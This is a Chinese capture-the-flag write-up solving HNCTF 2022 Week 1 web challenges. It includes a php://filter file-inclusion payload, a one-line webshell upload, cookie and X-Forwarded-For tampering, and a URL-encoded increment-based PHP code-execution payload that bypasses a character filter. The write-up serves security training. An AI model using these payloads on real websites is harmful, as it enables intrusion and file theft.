[HNCTF 2022 Week1]——Web方向 详细Writeup

Week1

[HNCTF 2022 Week1]2048

f12查看源代码

可以看出游戏的分数是score

修改score的值

得到flag

[HNCTF 2022 Week1]Interesting_include

得到源码

php 复制代码
<?php
//WEB手要懂得搜索
//flag in ./flag.php

if(isset($_GET['filter'])){
    $file = $_GET['filter'];
    if(!preg_match("/flag/i", $file)){
        die("error");
    }
    include($file);
}else{
    highlight_file(__FILE__);
} 

php伪协议,构造payload:

http://node3.anna.nssctf.cn:28894/?filter=php://filter/read=convert.base64-encode/resource=flag.php

base64解码得到flag

[HNCTF 2022 Week1]easy_upload

不是,你个标签整这么吓人干嘛啊???是谁!!

一句话木马直接挂马成功了

蚁剑直接连接

根目录下得到flag

[HNCTF 2022 Week1]easy_html

说饼干中好像有什么东西,那就看cookie,url转码一下,./f14g.php,然后去访问

说要输入手机号登录,本来想随便输入一个的,但是只能输入十位,并且会回显nononono!

利用burp抓包,强行输入11位数字,发包得到flag

[HNCTF 2022 Week1]What is Web

CTRL+U往下拉

base64解码得到flag

[HNCTF 2022 Week1]Interesting_http

说要post a want,那就给他发一个want

给了两个单词,肯定选flag,然后发包

提示Not admin,用burp抓包,可以看到cookie中有一个user,值是notadmin改成admin

提示No location,用XFF

拿到flag

[HNCTF 2022 Week1]Challenge__rce

f12查看hint,?hint

给hint传入一个值得到源码

php 复制代码
<?php
error_reporting(0);
if (isset($_GET['hint'])) {
    highlight_file(__FILE__);
}
if (isset($_POST['rce'])) {
    $rce = $_POST['rce'];
    if (strlen($rce) <= 120) {
        if (is_string($rce)) {
            if (!preg_match("/[!@#%^&*:'\-<?>\"\/|`a-zA-Z~\\\\]/", $rce)) {
                eval($rce);
            } else {
                echo("Are you hack me?");
            }
        } else {
            echo "I want string!";
        }
    } else {
        echo "too long!";
    }
} 

说明这里要进行RCE,但是过滤掉了大部分东西,这里可以用的是$()+,.0123456789;=[]_{},那么就是自增RCE

关于自增RCE可看这篇:CTFshow-RCE极限大挑战wp

直接放payload:

rce=$_=[]._;$__=$_[1];$_=$_[0];$_++;$_1=++$_;$_++;$_++;$_++;$_++;$_=$_1.++$_.$__;$_=_.$_(71).$_(69).$_(84);$$_[1]($$_[2]);

但是传入的时候要进行url编码

%24_%3D%5B%5D._%3B%24__%3D%24_%5B1%5D%3B%24_%3D%24_%5B0%5D%3B%24_%2B%2B%3B%24_1%3D%2B%2B%24_%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%2B%2B%3B%24_%3D%24_1.%2B%2B%24_.%24__%3B%24_%3D_.%24_(71).%24_(69).%24_(84)%3B%24%24_%5B1%5D(%24%24_%5B2%5D)%3B

并且传入的时候要传入12,如下

然后将2的值为cat /ffflllaaaggg

得到flag

相关推荐
梵刹古音12 分钟前
13_网络安全
网络·计算机网络·安全·web安全
千呼智慧新零售44 分钟前
收银系统源码-千呼新零售2.0【宠物、养生、大健康行业解决方案】
开源·php·零售·宠物
RICKC1311 小时前
帝国CMS(EmpireCMS)漏洞复现
web安全
金灰2 小时前
sqlmap注入详解
安全·web安全·网络安全·系统安全·安全威胁分析
亿林网络安全事业部3 小时前
对于中小企业,如何符合等保2.0的等级划分和保护要求?
网络·安全·web安全
mumu_wangwei3 小时前
【PHP】实现类的无缝动态扩展,设计模式,php工厂模式应用场景,以下代码是工厂模式在框架设计中的真实使用案例代码
开发语言·设计模式·php
CloudJourney5 小时前
深入理解 Linux 内核架构
开发语言·php
无泡汽水11 小时前
Pikachu靶场--SSRF
web安全
吾名招财14 小时前
5. web信息收集(OWASP实战训练)
前端·web安全
2401_8576176214 小时前
PyCharm 2024.1新特性探秘:开发者的超级动力升级
pycharm·php·perl